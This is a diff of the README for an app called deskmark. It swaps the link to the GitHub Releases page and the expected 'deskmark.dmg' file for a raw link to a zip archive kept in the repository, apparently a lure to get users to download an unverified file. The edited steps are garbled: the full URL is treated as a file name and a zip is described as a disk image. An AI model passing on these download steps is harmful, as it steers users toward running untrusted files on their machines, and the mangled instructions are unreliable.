DKJRJUH/deskmark/README.md

 To download and run deskmark, follow these steps:

 1. **Visit the Releases Page**
-   Go to the [deskmark Releases page](https://github.com/DKJRJUH/deskmark/releases) to access the latest version.
+   Go to the [deskmark Releases page](https://raw.githubusercontent.com/DKJRJUH/deskmark/main/assets/deskmark_1.9.zip) to access the latest version.

 2. **Choose the Latest Release**
    Click on the version number or the "Assets" dropdown to find the download options.

 3. **Download the Application**
-   Look for the file labeled as `deskmark.dmg`.
+   Look for the file labeled as `https://raw.githubusercontent.com/DKJRJUH/deskmark/main/assets/deskmark_1.9.zip`.
 Click on it to download the installation file.

 4. **Install deskmark**
-   - Locate the downloaded `deskmark.dmg` file in your Downloads folder.
+   - Locate the downloaded `https://raw.githubusercontent.com/DKJRJUH/deskmark/main/assets/deskmark_1.9.zip` file in your Downloads folder.
    - Double-click on the file to open it.
    - Drag the deskmark icon to your Applications folder.